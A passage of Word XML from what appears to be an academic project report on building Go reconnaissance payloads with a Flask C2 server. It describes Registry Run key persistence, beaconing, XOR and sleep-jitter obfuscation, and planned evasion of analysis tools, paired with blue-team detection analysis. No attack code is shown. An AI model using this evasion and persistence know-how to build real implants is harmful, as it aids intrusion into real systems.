      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ReconBeacon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) appeared after the v3 payload's first execution and was removed after registry cleanup. Wireshark captures were reviewed to confirm Filename headers were visible in plaintext and that the 60-second beacon interval was observable in the packet timestamps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313124C4" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="455C3FA1" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc226583783"/>
      <w:r>
        <w:t>Persistence Testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="7F01E7D0" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The v3 payload was executed, the VM was rebooted, and beacon traffic was observed recommencing within 60 seconds of desktop load — confirming that the Registry Run key successfully relaunched the payload. The registry key was then deleted manually and a second reboot confirmed that the payload no longer auto-started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07271F16" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="02E040AC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="701DCA5E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc226583784"/>
      <w:r>
        <w:t>11. Future Work</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="41E967B8" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="323CDA15" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="6387221B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Add HTTPS support to the C2 server to demonstrate encrypted exfiltration and explain why TLS inspection is needed on the defensive side. This would extend the network detection analysis significantly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523454C7" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Explore garble (Go-specific build-time obfuscator) as a fourth obfuscation layer beyond binary stripping. Garble randomises .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gopclntab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function names and build paths, defeating </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoReSym</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — the one tool that currently defeats the L09 stripping technique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA53082" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Add a live beacon log to the documentation website showing incoming beacons in real time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2842B961" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Document PowerShell CIM alternatives to wmic for environments where wmic.exe is deprecated on newer Windows builds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CE8306" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Conduct a full Zeek scripted analysis of captured beacon traffic to produce a formal written detection rule as a deliverable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67854D47" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="7FF27D4C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="14BDCB04" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc226583785"/>
      <w:r>
        <w:t>12. Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="50221C6A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A8DEAE" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="3473A0B0" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This project has successfully implemented three progressively capable reconnaissance payloads in Go, a Flask-based C2 server, and a companion documentation website covering all four phases of offensive tooling development. Each phase maps to a specific stage of the Cyber Kill Chain and is documented with corresponding MITRE ATT&amp;CK technique IDs. Phase 04 — the obfuscation phase — is fully complete, delivering all three planned techniques: XOR string encoding (v4), sleep jitter (v5), and binary stripping (v5_final compiled with -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ldflags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="-s -w").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E853DB" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="35E5E32F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The blue team analysis section demonstrates that the current payload is detectable at multiple layers — Sysmon events, network flow analysis, static binary inspection, and </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">registry monitoring. This is intentional: the academic value of the project lies not in building an undetectable tool, but in understanding exactly why and how each technique is detected, and what changes at each obfuscation step. The analysis of binary stripping is a clear example of this — stripping is defeated in under one minute by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoReSym</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> via the .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gopclntab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> section that the Go runtime cannot remove, and this limitation is documented explicitly alongside the technique itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4947C2" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="4952B478" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The project meets and exceeds its core goals: a working demonstration of reconnaissance, persistence, and C2 communication in a controlled environment, with three implemented obfuscation layers and comprehensive defensive analysis at every stage. The natural next step — garble for .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gopclntab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> obfuscation and HTTPS exfiltration — represents a clear direction for future work beyond the current scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52661798" w14:textId="77777777" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A6495B2" w14:textId="52EE303E" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6" w:rsidP="00DE13C6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>13. Bonus — Cloud Deployment of Documentation Website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCFC3E6" w14:textId="77777777" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6" w:rsidP="00DE13C6">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:t>As an extension to the project, the documentation website was deployed to a live cloud environment using the same AWS EC2 infrastructure established during the module's cloud computing project. This demonstrates the website functioning as a publicly accessible educational resource rather than a local Flask server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609B40AB" w14:textId="153950D4" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6" w:rsidP="00DE13C6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>13.1 Deployment Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0CD289" w14:textId="77777777" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6" w:rsidP="00DE13C6">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The website was containerised using Docker and deployed as a Kubernetes pod on a k3s cluster running on an AWS EC2 t3.small instance. The container runs </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gunicorn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as the production WSGI server with two worker processes, exposed via a Kubernetes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NodePort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> service on port 30081. This runs alongside the existing Flask CRUD application on port 30080, demonstrating the cluster hosting multiple independent services simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F5B99E" w14:textId="5ED33535" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6" w:rsidP="00DE13C6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>13.2 What Was Deployed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DED92A" w14:textId="77777777" w:rsidR="00DE13C6" w:rsidRPr="00DE13C6" w:rsidRDefault="00DE13C6" w:rsidP="00DE13C6">
      <w:pPr>
        <w:pStyle w:val="whitespace-normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE13C6">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>webpage.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE13C6">
        <w:t xml:space="preserve"> — Flask application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3DCFEA" w14:textId="77777777" w:rsidR="00DE13C6" w:rsidRPr="00DE13C6" w:rsidRDefault="00DE13C6" w:rsidP="00DE13C6">
      <w:pPr>
        <w:pStyle w:val="whitespace-normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE13C6">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>templates/</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE13C6">
        <w:t xml:space="preserve"> — all HTML pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005E0B92" w14:textId="77777777" w:rsidR="00DE13C6" w:rsidRPr="00DE13C6" w:rsidRDefault="00DE13C6" w:rsidP="00DE13C6">
      <w:pPr>
        <w:pStyle w:val="whitespace-normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE13C6">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>static/</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE13C6">
        <w:t xml:space="preserve"> — CSS and assets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EE7F0F" w14:textId="77777777" w:rsidR="00DE13C6" w:rsidRPr="00DE13C6" w:rsidRDefault="00DE13C6" w:rsidP="00DE13C6">
      <w:pPr>
        <w:pStyle w:val="whitespace-normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE13C6">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>downloadables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE13C6">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE13C6">
        <w:t xml:space="preserve"> — lesson documents and Go source files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028D43F0" w14:textId="77777777" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6" w:rsidP="00DE13C6">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:r>
        <w:t>No compiled binaries were included in the deployment in line with the ethical considerations outlined in Section 8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0073F5C1" w14:textId="7DDCBA11" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6" w:rsidP="00DE13C6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>13.3 Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC02576" w14:textId="77777777" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F7A4FA9" w14:textId="77777777" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59EE4D96" w14:textId="77777777" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="327491E6" w14:textId="77777777" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="241F921B" w14:textId="2EB9C173" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34318E21" wp14:editId="68480A23">
            <wp:extent cx="5724525" cy="1019175"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1916727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1019175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0779776B" w14:textId="77777777" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BFF6AC4" w14:textId="618B74BE" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32177080" wp14:editId="3FCE1F16">
            <wp:extent cx="5372100" cy="2162175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="209406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2100" cy="2162175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E23504" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="291F349A" w14:textId="64B7C344" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6" w:rsidP="00DE13C6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C7A53FB" wp14:editId="700B6A30">
            <wp:extent cx="5724525" cy="3133725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1793594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r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="584DCD68" wp14:editId="0CAD510F">
            <wp:extent cx="5724525" cy="371475"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="751989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4525" cy="371475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="47" w:name="_Toc226583786"/>
    </w:p>
    <w:p w14:paraId="415F98C6" w14:textId="37258CF7" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EBFEE32" wp14:editId="2C211848">
            <wp:extent cx="5724525" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="4894902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2971800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="581393AE" w14:textId="77777777" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A1608F4" wp14:editId="4A8DA5FC">
            <wp:extent cx="3172147" cy="4533900"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1791577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5985" cy="4539386"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A376684" w14:textId="77777777" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6853B479" w14:textId="77777777" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D2E6840" w14:textId="77777777" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12B67F72" wp14:editId="4AA64942">
            <wp:extent cx="3324225" cy="4236866"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1420594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25646" cy="4238677"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBA3D5A" w14:textId="77777777" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F1588C" w14:textId="77777777" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11048A44" wp14:editId="41887C9B">
            <wp:extent cx="2771565" cy="2548890"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="5347026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85130" cy="2561365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E89AE43" w14:textId="77777777" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0238AF19" w14:textId="77777777" w:rsidR="00DE13C6" w:rsidRDefault="00DE13C6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B15E979" w14:textId="2F02028B" w:rsidR="00793873" w:rsidRDefault="00793873">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28BA6B1B" wp14:editId="6739593E">
            <wp:extent cx="5734050" cy="8829675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="18829131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8829675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6FCBDE" w14:textId="77777777" w:rsidR="009B66DB" w:rsidRDefault="00793873">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2215F939" wp14:editId="4F386CAE">
            <wp:extent cx="4743450" cy="8858250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3717227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43450" cy="8858250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="580043DD" w14:textId="738EA908" w:rsidR="009B66DB" w:rsidRDefault="009B66DB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ReadMe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F338964" w14:textId="77777777" w:rsidR="000C6053" w:rsidRDefault="000C6053" w:rsidP="000C6053">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C2 Zoo — Documentation Website Educational C2 framework documentation portal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272AC31B" w14:textId="77777777" w:rsidR="000C6053" w:rsidRDefault="000C6053" w:rsidP="000C6053">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Requirements Python 3.11+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8BAD5D" w14:textId="77777777" w:rsidR="000C6053" w:rsidRDefault="000C6053" w:rsidP="000C6053">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Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F86985C" w14:textId="77777777" w:rsidR="000C6053" w:rsidRDefault="000C6053" w:rsidP="000C6053">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="F0F6FC"/>
        </w:rPr>
        <w:t>Clone the repo git clone cd C2_zooSetup_early</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298FD784" w14:textId="77777777" w:rsidR="000C6053" w:rsidRDefault="000C6053" w:rsidP="000C6053">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
